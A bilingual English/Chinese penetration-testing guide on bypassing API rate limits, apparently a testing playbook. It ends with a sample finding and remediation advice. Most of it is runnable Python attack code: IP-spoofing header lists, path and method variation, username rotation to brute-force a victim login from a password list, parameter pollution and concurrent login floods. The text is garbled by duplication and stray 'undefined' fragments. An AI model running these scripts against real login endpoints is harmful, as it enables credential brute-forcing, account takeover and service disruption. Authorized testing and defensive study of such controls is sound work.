performing-api-rate-limiting-bypass
Compare original and translation side by side
🇺🇸
Original
English🇨🇳
Translation
ChinesePerforming API Rate Limiting Bypass
API速率限制绕过测试
When to Use
适用场景
- Testing whether API rate limiting can be circumvented to enable brute force attacks on authentication endpoints
- Assessing the effectiveness of API throttling controls against credential stuffing or account enumeration
- Evaluating if rate limits are enforced consistently across all API versions, methods, and encoding formats
- Testing if API gateway rate limiting can be bypassed through header manipulation or IP rotation
- Validating that rate limits protect against resource exhaustion and denial-of-service conditions
Do not use without written authorization. Rate limit testing involves sending high volumes of requests that may impact service availability.
- 测试API速率限制是否可被绕过,从而对认证端点发起暴力攻击
- 评估API限流控制在应对凭证填充或账户枚举攻击时的有效性
- 验证速率限制是否在所有API版本、方法和编码格式中一致执行
- 测试是否可通过头操纵或IP轮换绕过API网关的速率限制
- 验证速率限制是否能防止资源耗尽和拒绝服务情况
未经书面授权请勿使用。速率限制测试涉及发送大量请求,可能影响服务可用性。
Prerequisites
前置条件
- Written authorization specifying target endpoints and acceptable request volumes
- Python 3.10+ with ,
requests, andaiohttplibrariesasyncio - Burp Suite Professional with Turbo Intruder extension for high-speed testing
- cURL for manual header manipulation testing
- Knowledge of the target's CDN and WAF infrastructure (Cloudflare, AWS WAF, Akamai)
- List of rate-limit bypass headers to test
- 明确目标端点和可接受请求量的书面授权
- 安装Python 3.10+及、
requests、aiohttp库asyncio - 带有Turbo Intruder扩展的Burp Suite Professional,用于高速测试
- cURL,用于手动头操纵测试
- 了解目标的CDN和WAF基础设施(Cloudflare、AWS WAF、Akamai)
- 待测试的速率限制绕过头列表
Workflow
测试流程
Step 1: Rate Limit Discovery and Baseline
步骤1:速率限制发现与基准测试
Identify how rate limiting is implemented:
python
import requests
import time
BASE_URL = "https://target-api.example.com/api/v1"
headers = {"Authorization": "Bearer <token>", "Content-Type": "application/json"}识别速率限制的实现方式:
python
import requests
import time
BASE_URL = "https://target-api.example.com/api/v1"
headers = {"Authorization": "Bearer <token>", "Content-Type": "application/json"}Send requests and track rate limit headers
Send requests and track rate limit headers
def probe_rate_limit(endpoint, method="GET", count=100):
results = []
for i in range(count):
resp = requests.request(method, f"{BASE_URL}{endpoint}", headers=headers)
rate_headers = {
"limit": resp.headers.get("X-RateLimit-Limit") or resp.headers.get("X-Rate-Limit-Limit"),
"remaining": resp.headers.get("X-RateLimit-Remaining") or resp.headers.get("X-Rate-Limit-Remaining"),
"reset": resp.headers.get("X-RateLimit-Reset") or resp.headers.get("X-Rate-Limit-Reset"),
"retry_after": resp.headers.get("Retry-After"),
"status": resp.status_code
}
results.append(rate_headers)
if resp.status_code == 429:
print(f"Rate limited at request {i+1}: {rate_headers}")
return results, i+1
time.sleep(0.05) # Small delay to avoid connection issues
print(f"No rate limit triggered after {count} requests")
return results, count
def probe_rate_limit(endpoint, method="GET", count=100):
results = []
for i in range(count):
resp = requests.request(method, f"{BASE_URL}{endpoint}", headers=headers)
rate_headers = {
"limit": resp.headers.get("X-RateLimit-Limit") or resp.headers.get("X-Rate-Limit-Limit"),
"remaining": resp.headers.get("X-RateLimit-Remaining") or resp.headers.get("X-Rate-Limit-Remaining"),
"reset": resp.headers.get("X-RateLimit-Reset") or resp.headers.get("X-Rate-Limit-Reset"),
"retry_after": resp.headers.get("Retry-After"),
"status": resp.status_code
}
results.append(rate_headers)
if resp.status_code == 429:
print(f"Rate limited at request {i+1}: {rate_headers}")
return results, i+1
time.sleep(0.05) # Small delay to avoid connection issues
print(f"No rate limit triggered after {count} requests")
return results, count
Test key endpoints
Test key endpoints
login_results, login_threshold = probe_rate_limit("/auth/login", "POST", 200)
api_results, api_threshold = probe_rate_limit("/users/me", "GET", 200)
search_results, search_threshold = probe_rate_limit("/search?q=test", "GET", 200)
print(f"\nRate Limit Summary:")
print(f" Login: Triggered at request {login_threshold}")
print(f" API: Triggered at request {api_threshold}")
print(f" Search: Triggered at request {search_threshold}")
undefinedlogin_results, login_threshold = probe_rate_limit("/auth/login", "POST", 200)
api_results, api_threshold = probe_rate_limit("/users/me", "GET", 200)
search_results, search_threshold = probe_rate_limit("/search?q=test", "GET", 200)
print(f"\nRate Limit Summary:")
print(f" Login: Triggered at request {login_threshold}")
print(f" API: Triggered at request {api_threshold}")
print(f" Search: Triggered at request {search_threshold}")
undefinedStep 2: IP-Based Bypass Techniques
步骤2:基于IP的绕过技术
python
undefinedpython
undefinedBypass Technique 1: Header-based IP spoofing
Bypass Technique 1: Header-based IP spoofing
IP_SPOOFING_HEADERS = [
"X-Forwarded-For",
"X-Real-IP",
"X-Original-Forwarded-For",
"X-Originating-IP",
"X-Remote-IP",
"X-Remote-Addr",
"X-Client-IP",
"X-Host",
"X-Forwarded-Host",
"True-Client-IP",
"Cluster-Client-IP",
"X-ProxyUser-Ip",
"Forwarded",
"CF-Connecting-IP",
"Fastly-Client-IP",
"X-Azure-ClientIP",
"X-Akamai-Client-IP",
]
def test_ip_spoofing_bypass(endpoint, method="POST", body=None):
"""Test if IP spoofing headers bypass rate limiting."""
# First, trigger the rate limit normally
for i in range(200):
resp = requests.request(method, f"{BASE_URL}{endpoint}", headers=headers, json=body)
if resp.status_code == 429:
print(f"Rate limit triggered at request {i+1}")
break
# Now test each spoofing header
bypasses_found = []
for header in IP_SPOOFING_HEADERS:
spoofed_headers = {**headers, header: f"10.0.{i%256}.{(i*7)%256}"}
resp = requests.request(method, f"{BASE_URL}{endpoint}", headers=spoofed_headers, json=body)
if resp.status_code != 429:
bypasses_found.append(header)
print(f"[BYPASS] {header} -> {resp.status_code}")
return bypasses_foundlogin_body = {"username": "test@example.com", "password": "wrongpassword"}
bypasses = test_ip_spoofing_bypass("/auth/login", "POST", login_body)
undefinedIP_SPOOFING_HEADERS = [
"X-Forwarded-For",
"X-Real-IP",
"X-Original-Forwarded-For",
"X-Originating-IP",
"X-Remote-IP",
"X-Remote-Addr",
"X-Client-IP",
"X-Host",
"X-Forwarded-Host",
"True-Client-IP",
"Cluster-Client-IP",
"X-ProxyUser-Ip",
"Forwarded",
"CF-Connecting-IP",
"Fastly-Client-IP",
"X-Azure-ClientIP",
"X-Akamai-Client-IP",
]
def test_ip_spoofing_bypass(endpoint, method="POST", body=None):
"""Test if IP spoofing headers bypass rate limiting."""
# First, trigger the rate limit normally
for i in range(200):
resp = requests.request(method, f"{BASE_URL}{endpoint}", headers=headers, json=body)
if resp.status_code == 429:
print(f"Rate limit triggered at request {i+1}")
break
# Now test each spoofing header
bypasses_found = []
for header in IP_SPOOFING_HEADERS:
spoofed_headers = {**headers, header: f"10.0.{i%256}.{(i*7)%256}"}
resp = requests.request(method, f"{BASE_URL}{endpoint}", headers=spoofed_headers, json=body)
if resp.status_code != 429:
bypasses_found.append(header)
print(f"[BYPASS] {header} -> {resp.status_code}")
return bypasses_foundlogin_body = {"username": "test@example.com", "password": "wrongpassword"}
bypasses = test_ip_spoofing_bypass("/auth/login", "POST", login_body)
undefinedStep 3: Endpoint Variation Bypass
步骤3:端点变体绕过
python
undefinedpython
undefinedBypass Technique 2: URL path variation
Bypass Technique 2: URL path variation
def test_path_variation_bypass(base_endpoint, token):
"""Test if path variations bypass rate limit tied to specific endpoint."""
variations = [
base_endpoint, # /api/v1/auth/login
base_endpoint + "/", # /api/v1/auth/login/
base_endpoint.upper(), # /API/V1/AUTH/LOGIN
base_endpoint + "?dummy=1", # /api/v1/auth/login?dummy=1
base_endpoint + "#fragment", # /api/v1/auth/login#fragment
base_endpoint + "%20", # /api/v1/auth/login%20
base_endpoint + "/..", # /api/v1/auth/login/..
base_endpoint.replace("/v1/", "/v2/"), # /api/v2/auth/login
base_endpoint + ";", # /api/v1/auth/login;
base_endpoint + "\t", # Tab character
base_endpoint + "%00", # Null byte
base_endpoint + "..;/", # Spring path traversal
]
# Trigger rate limit on original endpoint first
for i in range(200):
resp = requests.post(f"{BASE_URL}{base_endpoint}",
headers={"Authorization": f"Bearer {token}"},
json={"username": "test", "password": "wrong"})
if resp.status_code == 429:
break
# Test variations
for variant in variations:
try:
resp = requests.post(f"{BASE_URL}{variant}",
headers={"Authorization": f"Bearer {token}"},
json={"username": "test", "password": "wrong"})
if resp.status_code != 429:
print(f"[BYPASS] Path variation: {variant} -> {resp.status_code}")
except Exception:
passtest_path_variation_bypass("/auth/login", "<token>")
undefineddef test_path_variation_bypass(base_endpoint, token):
"""Test if path variations bypass rate limit tied to specific endpoint."""
variations = [
base_endpoint, # /api/v1/auth/login
base_endpoint + "/", # /api/v1/auth/login/
base_endpoint.upper(), # /API/V1/AUTH/LOGIN
base_endpoint + "?dummy=1", # /api/v1/auth/login?dummy=1
base_endpoint + "#fragment", # /api/v1/auth/login#fragment
base_endpoint + "%20", # /api/v1/auth/login%20
base_endpoint + "/..", # /api/v1/auth/login/..
base_endpoint.replace("/v1/", "/v2/"), # /api/v2/auth/login
base_endpoint + ";", # /api/v1/auth/login;
base_endpoint + "\t", # Tab character
base_endpoint + "%00", # Null byte
base_endpoint + "..;/", # Spring path traversal
]
# Trigger rate limit on original endpoint first
for i in range(200):
resp = requests.post(f"{BASE_URL}{base_endpoint}",
headers={"Authorization": f"Bearer {token}"},
json={"username": "test", "password": "wrong"})
if resp.status_code == 429:
break
# Test variations
for variant in variations:
try:
resp = requests.post(f"{BASE_URL}{variant}",
headers={"Authorization": f"Bearer {token}"},
json={"username": "test", "password": "wrong"})
if resp.status_code != 429:
print(f"[BYPASS] Path variation: {variant} -> {resp.status_code}")
except Exception:
passtest_path_variation_bypass("/auth/login", "<token>")
undefinedStep 4: HTTP Method and Content-Type Bypass
步骤4:HTTP方法与Content-Type绕过
python
undefinedpython
undefinedBypass Technique 3: Method and content-type switching
Bypass Technique 3: Method and content-type switching
def test_method_bypass(endpoint, original_body):
"""Test if rate limit is method-specific."""
methods_to_test = ["POST", "PUT", "PATCH", "GET", "OPTIONS"]
content_types = [
"application/json",
"application/x-www-form-urlencoded",
"multipart/form-data",
"text/plain",
"application/xml",
"text/xml",
]
# Trigger rate limit with POST + application/json
for i in range(200):
resp = requests.post(f"{BASE_URL}{endpoint}",
headers={**headers, "Content-Type": "application/json"},
json=original_body)
if resp.status_code == 429:
break
# Test other methods
for method in methods_to_test:
if method == "POST":
continue
resp = requests.request(method, f"{BASE_URL}{endpoint}",
headers=headers, json=original_body)
if resp.status_code not in (429, 405):
print(f"[BYPASS] Method switch to {method}: {resp.status_code}")
# Test other content types
for ct in content_types:
if ct == "application/json":
continue
test_headers = {**headers, "Content-Type": ct}
if ct == "application/x-www-form-urlencoded":
data = "&".join(f"{k}={v}" for k, v in original_body.items())
resp = requests.post(f"{BASE_URL}{endpoint}", headers=test_headers, data=data)
else:
resp = requests.post(f"{BASE_URL}{endpoint}", headers=test_headers,
data=str(original_body))
if resp.status_code != 429:
print(f"[BYPASS] Content-Type {ct}: {resp.status_code}")test_method_bypass("/auth/login", {"username": "test@example.com", "password": "wrong"})
undefineddef test_method_bypass(endpoint, original_body):
"""Test if rate limit is method-specific."""
methods_to_test = ["POST", "PUT", "PATCH", "GET", "OPTIONS"]
content_types = [
"application/json",
"application/x-www-form-urlencoded",
"multipart/form-data",
"text/plain",
"application/xml",
"text/xml",
]
# Trigger rate limit with POST + application/json
for i in range(200):
resp = requests.post(f"{BASE_URL}{endpoint}",
headers={**headers, "Content-Type": "application/json"},
json=original_body)
if resp.status_code == 429:
break
# Test other methods
for method in methods_to_test:
if method == "POST":
continue
resp = requests.request(method, f"{BASE_URL}{endpoint}",
headers=headers, json=original_body)
if resp.status_code not in (429, 405):
print(f"[BYPASS] Method switch to {method}: {resp.status_code}")
# Test other content types
for ct in content_types:
if ct == "application/json":
continue
test_headers = {**headers, "Content-Type": ct}
if ct == "application/x-www-form-urlencoded":
data = "&".join(f"{k}={v}" for k, v in original_body.items())
resp = requests.post(f"{BASE_URL}{endpoint}", headers=test_headers, data=data)
else:
resp = requests.post(f"{BASE_URL}{endpoint}", headers=test_headers,
data=str(original_body))
if resp.status_code != 429:
print(f"[BYPASS] Content-Type {ct}: {resp.status_code}")test_method_bypass("/auth/login", {"username": "test@example.com", "password": "wrong"})
undefinedStep 5: Account-Level Bypass Techniques
步骤5:账户级绕过技术
python
undefinedpython
undefinedBypass Technique 4: Rotate identifiers to avoid per-account limits
Bypass Technique 4: Rotate identifiers to avoid per-account limits
import string
import random
def test_account_rotation_bypass(login_endpoint, target_password_list):
"""Test if rate limit is per-account, bypassed by rotating usernames."""
target_email = "victim@example.com"
# Test 1: Per-account rate limit bypass by rotating the username field
# with slight variations
email_variations = [
target_email,
target_email.upper(),
f" {target_email}",
f"{target_email} ",
target_email.replace("@", "%40"),
f"+tag@".join(target_email.split("@")), # victim+tag@example.com
]
for password in target_password_list[:50]:
for email_var in email_variations:
resp = requests.post(f"{BASE_URL}{login_endpoint}",
json={"username": email_var, "password": password})
if resp.status_code == 200:
print(f"[SUCCESS] Logged in with: {email_var} / {password}")
return True
elif resp.status_code == 429:
print(f"Rate limited on variation: {email_var}")
# Small delay
time.sleep(0.1)
return Falseimport string
import random
def test_account_rotation_bypass(login_endpoint, target_password_list):
"""Test if rate limit is per-account, bypassed by rotating usernames."""
target_email = "victim@example.com"
# Test 1: Per-account rate limit bypass by rotating the username field
# with slight variations
email_variations = [
target_email,
target_email.upper(),
f" {target_email}",
f"{target_email} ",
target_email.replace("@", "%40"),
f"+tag@".join(target_email.split("@")), # victim+tag@example.com
]
for password in target_password_list[:50]:
for email_var in email_variations:
resp = requests.post(f"{BASE_URL}{login_endpoint}",
json={"username": email_var, "password": password})
if resp.status_code == 200:
print(f"[SUCCESS] Logged in with: {email_var} / {password}")
return True
elif resp.status_code == 429:
print(f"Rate limited on variation: {email_var}")
# Small delay
time.sleep(0.1)
return FalseBypass Technique 5: Parameter pollution
Bypass Technique 5: Parameter pollution
def test_parameter_pollution_bypass(endpoint):
"""Add extra parameters to make each request appear unique."""
for i in range(200):
random_param = ''.join(random.choices(string.ascii_lowercase, k=8))
resp = requests.post(
f"{BASE_URL}{endpoint}?{random_param}={i}",
headers=headers,
json={"username": "test@example.com", "password": f"attempt_{i}"}
)
if resp.status_code == 429:
print(f"Parameter pollution failed at request {i+1}")
return False
print("[BYPASS] Parameter pollution: 200 requests without rate limit")
return True
undefineddef test_parameter_pollution_bypass(endpoint):
"""Add extra parameters to make each request appear unique."""
for i in range(200):
random_param = ''.join(random.choices(string.ascii_lowercase, k=8))
resp = requests.post(
f"{BASE_URL}{endpoint}?{random_param}={i}",
headers=headers,
json={"username": "test@example.com", "password": f"attempt_{i}"}
)
if resp.status_code == 429:
print(f"Parameter pollution failed at request {i+1}")
return False
print("[BYPASS] Parameter pollution: 200 requests without rate limit")
return True
undefinedStep 6: Distributed and Async Testing
步骤6:分布式与异步测试
python
import asyncio
import aiohttp
async def distributed_rate_limit_test(endpoint, total_requests=1000, concurrency=50):
"""Test rate limiting under concurrent load."""
results = {"success": 0, "rate_limited": 0, "errors": 0}
async def make_request(session, request_num):
try:
# Rotate X-Forwarded-For per request
req_headers = {
**headers,
"X-Forwarded-For": f"192.168.{request_num % 256}.{(request_num * 3) % 256}"
}
async with session.post(
f"{BASE_URL}{endpoint}",
headers=req_headers,
json={"username": "test@example.com", "password": f"attempt_{request_num}"}
) as resp:
if resp.status == 429:
results["rate_limited"] += 1
elif resp.status in (200, 401):
results["success"] += 1
else:
results["errors"] += 1
except Exception:
results["errors"] += 1
connector = aiohttp.TCPConnector(limit=concurrency)
async with aiohttp.ClientSession(connector=connector) as session:
tasks = [make_request(session, i) for i in range(total_requests)]
await asyncio.gather(*tasks)
print(f"\nDistributed Test Results:")
print(f" Successful: {results['success']}")
print(f" Rate Limited: {results['rate_limited']}")
print(f" Errors: {results['errors']}")
print(f" Bypass Rate: {results['success']/(results['success']+results['rate_limited'])*100:.1f}%")python
import asyncio
import aiohttp
async def distributed_rate_limit_test(endpoint, total_requests=1000, concurrency=50):
"""Test rate limiting under concurrent load."""
results = {"success": 0, "rate_limited": 0, "errors": 0}
async def make_request(session, request_num):
try:
# Rotate X-Forwarded-For per request
req_headers = {
**headers,
"X-Forwarded-For": f"192.168.{request_num % 256}.{(request_num * 3) % 256}"
}
async with session.post(
f"{BASE_URL}{endpoint}",
headers=req_headers,
json={"username": "test@example.com", "password": f"attempt_{request_num}"}
) as resp:
if resp.status == 429:
results["rate_limited"] += 1
elif resp.status in (200, 401):
results["success"] += 1
else:
results["errors"] += 1
except Exception:
results["errors"] += 1
connector = aiohttp.TCPConnector(limit=concurrency)
async with aiohttp.ClientSession(connector=connector) as session:
tasks = [make_request(session, i) for i in range(total_requests)]
await asyncio.gather(*tasks)
print(f"\nDistributed Test Results:")
print(f" Successful: {results['success']}")
print(f" Rate Limited: {results['rate_limited']}")
print(f" Errors: {results['errors']}")
print(f" Bypass Rate: {results['success']/(results['success']+results['rate_limited'])*100:.1f}%")asyncio.run(distributed_rate_limit_test("/auth/login"))
asyncio.run(distributed_rate_limit_test("/auth/login"))
undefinedundefinedKey Concepts
核心概念
| Term | Definition |
|---|---|
| Rate Limiting | Controlling the number of requests a client can make to an API within a time window, typically enforced per IP, per user, or per API key |
| Unrestricted Resource Consumption | OWASP API4:2023 - APIs that do not properly limit the size or number of resources requested, enabling DoS or brute force attacks |
| X-Forwarded-For Spoofing | Manipulating the X-Forwarded-For header to make the server believe requests originate from different IP addresses, bypassing IP-based rate limits |
| Credential Stuffing | Automated injection of stolen username/password pairs against login endpoints, requiring rate limit bypass for large-scale attacks |
| Token Bucket | Rate limiting algorithm that allows bursts of requests up to a bucket size, refilling at a constant rate |
| Sliding Window | Rate limiting algorithm that tracks requests in a rolling time window, more resistant to burst attacks than fixed windows |
| 术语 | 定义 |
|---|---|
| 速率限制(Rate Limiting) | 控制客户端在指定时间窗口内向API发起的请求数量,通常基于IP、用户或API密钥执行 |
| 无限制资源消耗(Unrestricted Resource Consumption) | OWASP API4:2023 - API未对请求的资源大小或数量进行适当限制,导致DoS或暴力攻击 |
| X-Forwarded-For伪造(X-Forwarded-For Spoofing) | 操纵X-Forwarded-For头,使服务器认为请求来自不同IP地址,绕过基于IP的速率限制 |
| 凭证填充(Credential Stuffing) | 自动注入被盗的用户名/密码对到登录端点,需要绕过速率限制才能发起大规模攻击 |
| 令牌桶(Token Bucket) | 速率限制算法,允许突发请求至桶的容量上限,之后以恒定速率补充令牌 |
| 滑动窗口(Sliding Window) | 速率限制算法,在滚动时间窗口内跟踪请求,比固定窗口更能抵御突发攻击 |
Tools & Systems
工具与系统
- Burp Suite Turbo Intruder: High-performance request sender for rate limit testing using Python-based scripting engine
- ffuf: Fast web fuzzer capable of testing rate limits with configurable request rates and header manipulation
- wfuzz: Web fuzzer with support for header injection, parameter fuzzing, and rate limit evasion techniques
- Postman Collection Runner: Automated collection execution with variable rotation for rate limit bypass testing
- Gatling/k6: Load testing tools that simulate realistic traffic patterns to test rate limiting under production-like conditions
- Burp Suite Turbo Intruder:基于Python脚本引擎的高性能请求发送器,用于速率限制测试
- ffuf:快速Web模糊测试工具,支持配置请求速率和头操纵的速率限制测试
- wfuzz:Web模糊测试工具,支持头注入、参数模糊测试和速率限制规避技术
- Postman Collection Runner:自动化集合执行工具,支持变量轮换以测试速率限制绕过
- Gatling/k6:负载测试工具,模拟真实流量模式以测试生产环境下的速率限制
Common Scenarios
常见场景
Scenario: Login API Rate Limit Bypass Assessment
场景:登录API速率限制绕过评估
Context: A financial services API implements rate limiting on the login endpoint to prevent brute force attacks. The security team wants to verify the effectiveness of these controls before a compliance audit.
Approach:
- Baseline: Send 100 requests to - rate limited at request 10 per minute per IP
POST /api/v1/auth/login - Test X-Forwarded-For rotation: Send 100 requests with unique X-Forwarded-For values - rate limit bypassed (all requests return 401, not 429)
- Test path variation: (trailing slash) resets the rate limit counter
/api/v1/auth/login/ - Test API versioning: has no rate limiting configured (shadow API)
/api/v2/auth/login - Test parameter pollution: Adding to each request bypasses the rate limit
?_=<random> - Test concurrent requests: 50 simultaneous requests from same IP - 45 succeed before rate limit kicks in (race condition in counter)
- Determine that rate limiting is implemented at the nginx reverse proxy level using IP-only tracking, trusting X-Forwarded-For header without validation
Pitfalls:
- Sending too many requests too fast and causing actual denial of service to the test environment
- Not testing rate limits on password reset, MFA verification, and account enumeration endpoints
- Assuming the rate limit applies globally when it may be per-endpoint or per-method only
- Missing race conditions in rate limit counters that allow burst bypasses
- Not testing both authenticated and unauthenticated rate limiting separately
背景:某金融服务API在登录端点实现速率限制以防止暴力攻击。安全团队希望在合规审计前验证这些控制的有效性。
方法:
- 基准测试:向发送100次请求 - 每分钟每IP限制10次请求
POST /api/v1/auth/login - 测试X-Forwarded-For轮换:发送100次带有唯一X-Forwarded-For值的请求 - 成功绕过速率限制(所有请求返回401而非429)
- 测试路径变体:(末尾斜杠)重置了速率限制计数器
/api/v1/auth/login/ - 测试API版本:未配置速率限制(影子API)
/api/v2/auth/login - 测试参数污染:每个请求添加可绕过速率限制
?_=<随机值> - 测试并发请求:同一IP发起50次并发请求 - 45次成功后才触发速率限制(计数器竞态条件)
- 确定速率限制在nginx反向代理层实现,仅基于IP跟踪,未验证X-Forwarded-For头
常见陷阱:
- 发送请求过快过多,导致测试环境实际拒绝服务
- 未测试密码重置、MFA验证和账户枚举端点的速率限制
- 假设速率限制全局适用,但实际可能仅针对特定端点或方法
- 忽略速率限制计数器中的竞态条件,导致突发绕过
- 未分别测试已认证和未认证的速率限制
Output Format
输出格式
undefinedundefinedFinding: Rate Limiting Bypass via X-Forwarded-For Header Spoofing
发现:通过X-Forwarded-For头伪造绕过速率限制
ID: API-RATE-001
Severity: High (CVSS 7.3)
OWASP API: API4:2023 - Unrestricted Resource Consumption
Affected Endpoints:
- POST /api/v1/auth/login
- POST /api/v1/auth/forgot-password
- POST /api/v1/auth/verify-mfa
Description:
The API rate limiting implementation relies on the X-Forwarded-For header
to identify client IP addresses. Since the application sits behind a load
balancer that does not strip or validate this header, an attacker can set
arbitrary X-Forwarded-For values to bypass the 10 requests/minute rate limit
on authentication endpoints.
Bypass Methods Confirmed:
- X-Forwarded-For rotation: 1000 login attempts in 60 seconds (vs 10 limit)
- Trailing slash path variation: /auth/login/ treated as separate endpoint
- API v2 endpoint: No rate limiting configured
- Race condition: 50 concurrent requests, 45 succeed before counter updates
Impact:
An attacker can perform unlimited brute force attacks against any user
account, bypassing the rate limit designed to prevent credential stuffing.
At 1000 attempts per minute, a 6-digit PIN can be brute-forced in under
17 minutes.
Remediation:
- Configure the load balancer to set X-Forwarded-For and strip client-provided values
- Implement rate limiting at the application layer using authenticated user ID, not just IP
- Normalize URL paths before applying rate limit rules (strip trailing slashes, enforce lowercase)
- Apply rate limits consistently across all API versions and content types
- Use atomic rate limit counters (Redis INCR) to prevent race conditions
- Implement progressive delays (exponential backoff) in addition to hard limits
undefinedID:API-RATE-001
严重程度:高(CVSS 7.3)
OWASP API:API4:2023 - 无限制资源消耗
受影响端点:
- POST /api/v1/auth/login
- POST /api/v1/auth/forgot-password
- POST /api/v1/auth/verify-mfa
描述:
API速率限制实现依赖X-Forwarded-For头识别客户端IP地址。由于应用位于未剥离或验证该头的负载均衡器之后,攻击者可设置任意X-Forwarded-For值,绕过认证端点每分钟10次请求的限制。
已确认的绕过方法:
- X-Forwarded-For轮换:60秒内发起1000次登录尝试(远超10次限制)
- 末尾斜杠路径变体:/auth/login/被视为独立端点
- API v2端点:未配置速率限制
- 竞态条件:50次并发请求中45次成功,之后计数器才更新
影响:
攻击者可对任意用户账户发起无限制暴力攻击,绕过用于防止凭证填充的速率限制。以每分钟1000次尝试计算,6位PIN码可在不到17分钟内被暴力破解。
修复建议:
- 配置负载均衡器设置X-Forwarded-For并剥离客户端提供的值
- 在应用层基于已认证用户ID而非仅IP实现速率限制
- 在应用速率限制规则前标准化URL路径(去除末尾斜杠、强制小写)
- 在所有API版本和内容类型中一致应用速率限制
- 使用原子速率限制计数器(Redis INCR)防止竞态条件
- 除硬限制外,实现渐进式延迟(指数退避)
undefined